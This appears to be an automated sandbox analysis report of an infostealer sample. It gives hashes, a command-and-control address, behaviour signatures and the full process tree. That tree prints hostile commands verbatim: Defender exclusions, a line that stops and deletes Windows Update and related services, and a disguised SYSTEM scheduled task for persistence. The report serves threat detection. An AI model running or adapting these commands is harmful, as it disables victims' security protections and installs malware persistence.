Analysis
max time kernel: 55s
max time network: 72s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-02-2023 06:02
Static task: static1
General
Target: 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe
Size: 626KB
MD5: 47b01695ff80b03ae518b333163da42c
SHA1: aa95d6c08ae9201828da23593e42df4a2e39ce82
SHA256: 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e
SHA512: 886a285e76a7d41e14bb1cfef3a464dc47e4b665bfd6905f26961253fd5f4eee0a6fed01afd464d603c8d17f6d09edc475e2fdd4da79178c6be0f54dc5bad466
SSDEEP: 6144:fMEN1L7wFSXZX4KipZx7fuwkBzvGwxAOo8jRfAAfc:f9N1LkFSJX45p3Uhq8jRAAE
Malware Config
Extracted: aurora
107.182.129.73:8081
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
description | pid | Process | procid_target
PID 1756 created 3180 | 1756 | SmartDefRun.exe | 48
PID 1756 created 3180 | 1756 | SmartDefRun.exe | 48
PID 1756 created 3180 | 1756 | SmartDefRun.exe | 48
PID 1756 created 3180 | 1756 | SmartDefRun.exe | 48
PID 1892 created 600 | 1892 | powershell.EXE | 3
-
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | Process
6 | 1488 | powershell.exe
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | SmartDefRun.exe
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 4 IoCs
Processes:
pid | Process
3152 | new2.exe
4892 | C4Loader.exe
1756 | SmartDefRun.exe
1956 | SysApp.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 4 IoCs
Processes:
description | ioc | Process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
description | pid | Process | procid_target
PID 1772 set thread context of 4328 | 1772 | 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe | 81
PID 1756 set thread context of 2476 | 1756 | SmartDefRun.exe | 116
PID 1892 set thread context of 2736 | 1892 | powershell.EXE | 121
-
Drops file in Program Files directory 1 IoCs
Processes:
description | ioc | Process
File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | SmartDefRun.exe
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | Process
4396 | sc.exe
3920 | sc.exe
488 | sc.exe
1468 | sc.exe
2880 | sc.exe
-
Program crash 1 IoCs
Processes:
pid | pid_target | Process | procid_target
1632 | 1772 | WerFault.exe | 79
-
Modifies data under HKEY_USERS 64 IoCs
Processes: (64 registry-key creation entries by powershell.EXE; full list elided)
-
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes: (33 pid/Process entries; full list elided)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: (64 privilege-token entries; full list elided)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: (64 wrote-to-memory entries; full list elided)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(indentation shows the parent/child depth of the process tree)

C:\Windows\system32\lsass.exe
  Command line: C:\Windows\system32\lsass.exe
  PID: 680

C:\Windows\system32\winlogon.exe
  Command line: winlogon.exe
  PID: 600

  C:\Windows\system32\dwm.exe
    Command line: "dwm.exe"
    PID: 416

  C:\Windows\System32\dllhost.exe
    Command line: C:\Windows\System32\dllhost.exe /Processid:{a207f7fb-907e-44ba-841f-b0a440ffbcd2}
    PID: 2736
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
  PID: 1048

C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  PID: 3180

  C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe"
    PID: 1772
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      PID: 4328
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
        PID: 1488
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\new2.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\new2.exe"
          PID: 3152
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory

          C:\Windows\System32\Wbem\wmic.exe
            Command line: wmic os get Caption
            PID: 3548
            - Suspicious use of AdjustPrivilegeToken

          C:\Windows\system32\cmd.exe
            Command line: cmd /C "wmic path win32_VideoController get name"
            PID: 4816
            - Suspicious use of WriteProcessMemory

            C:\Windows\System32\Wbem\WMIC.exe
              Command line: wmic path win32_VideoController get name
              PID: 1812
              - Suspicious use of AdjustPrivilegeToken

          C:\Windows\system32\cmd.exe
            Command line: cmd /C "wmic cpu get name"
            PID: 1316
            - Suspicious use of WriteProcessMemory

            C:\Windows\System32\Wbem\WMIC.exe
              Command line: wmic cpu get name
              PID: 3768

        C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
          PID: 4892
          - Executes dropped EXE

        C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
          PID: 1756
          - Suspicious use of NtCreateUserProcessOtherParentProcess
          - Drops file in Drivers directory
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Drops file in Program Files directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\SysApp.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
          PID: 1956
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 240
      PID: 1632
      - Program crash

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    PID: 5092
    - Suspicious behavior: EnumeratesProcesses

  C:\Windows\System32\cmd.exe
    Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    PID: 3124
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\sc.exe
      Command line: sc stop UsoSvc
      PID: 4396
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      Command line: sc stop WaaSMedicSvc
      PID: 3920
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      Command line: sc stop wuauserv
      PID: 488
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      Command line: sc stop bits
      PID: 1468
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      Command line: sc stop dosvc
      PID: 2880
      - Launches sc.exe

    C:\Windows\System32\reg.exe
      Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      PID: 4712

    C:\Windows\System32\reg.exe
      Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      PID: 4280

    C:\Windows\System32\reg.exe
      Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      PID: 4312
      - Modifies security service

    C:\Windows\System32\reg.exe
      Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      PID: 2408

    C:\Windows\System32\reg.exe
      Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      PID: 1100

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
    PID: 2728
    - Suspicious behavior: EnumeratesProcesses

  C:\Windows\System32\dialer.exe
    Command line: C:\Windows\System32\dialer.exe
    PID: 2476

C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  PID: 1144
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "<obfuscated PowerShell script elided>"
    PID: 1328
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "<obfuscated PowerShell script elided>"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID: 1892
-
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
PID: 1072
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
PID: 904
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
PID: 524
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
PID: 960
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1772 -ip 1772
PID: 4740
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize 19KB
MD5 38e4b278a0b8fbf2a491c258b09c3a60
SHA1 f988c2148d136fb4999d27f7868ec8146e25b721
SHA256 48b2004956b799251c3c959e422c77fbf86a77da3a8e461bc9cf3ce3117ea8e3
SHA512 6fc0a44066a4a0cdb262d6a61e92f57bf01192b4053d01a8588de39c82c74b5a2678d9c843042b769c3cb1df58bfba6c684c8b68109c2c7022b7fcd441255765
-
Filesize 948B
MD5 a7ce8cefc3f798abe5abd683d0ef26dd
SHA1 b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA256 5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512 c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
Filesize 1.4MB
MD5 bb86a343080f9f4696c250ef31a18d9d
SHA1 43b2193dcb1d56eac73ba88a7b461822074192d6
SHA256 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA512 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize 1.4MB
MD5 bb86a343080f9f4696c250ef31a18d9d
SHA1 43b2193dcb1d56eac73ba88a7b461822074192d6
SHA256 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA512 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize 1.4MB
MD5 bb86a343080f9f4696c250ef31a18d9d
SHA1 43b2193dcb1d56eac73ba88a7b461822074192d6
SHA256 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA512 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize 2KB
MD5 77e31b1123e94ce5720ceb729a425798
SHA1 2b65c95f27d8dca23864a3ed4f78490039ae27bf
SHA256 68cafb091d3642a1ad2440bdb51834086945ded836ea25c8f75de7e5fc568d85
SHA512 9c660381b859040e20745a1cf42646af3bd3780e2795a5ff3cedc61db9877b608d1fc431a1bd3ba3f25dd3643898b1c0f2abfc067c6634e4ce65de2d4c0c724a
-
Filesize 3.7MB
MD5 f5c51e7760315ad0f0238d268c03c60e
SHA1 85ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256 ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512 d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize 3.7MB
MD5 f5c51e7760315ad0f0238d268c03c60e
SHA1 85ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256 ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512 d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize 3.7MB
MD5 f5c51e7760315ad0f0238d268c03c60e
SHA1 85ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256 ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512 d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize 1.4MB
MD5 b6bbab9f72c88d07b484cc339c475e75
SHA1 f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256 dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize 1.4MB
MD5 b6bbab9f72c88d07b484cc339c475e75
SHA1 f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256 dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize 1.4MB
MD5 b6bbab9f72c88d07b484cc339c475e75
SHA1 f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256 dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize 71KB
MD5 386c014d0948d4fc41afa98cfca9022e
SHA1 786cc52d9b962f55f92202c7d50c3707eb62607b
SHA256 448b329f3a10bbe3e8f86cd91509c2783b63d28a375231eb23724f5e141420f2
SHA512 13d46209c6b052977d6242763b54ac5e35b389e765c82ba773b520ebf5eacabdfdc22b642cb9760e39ad59dd82fa40a31a8d41fd6dd7ea9c9ad08c57b7d8150f
-
Filesize 3.0MB
MD5 50d48404f9b93a16c69aed2e6c585192
SHA1 3f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA256 0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA512 0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
Filesize 3.0MB
MD5 50d48404f9b93a16c69aed2e6c585192
SHA1 3f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA256 0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA512 0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
Filesize 3.0MB
MD5 50d48404f9b93a16c69aed2e6c585192
SHA1 3f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA256 0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA512 0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774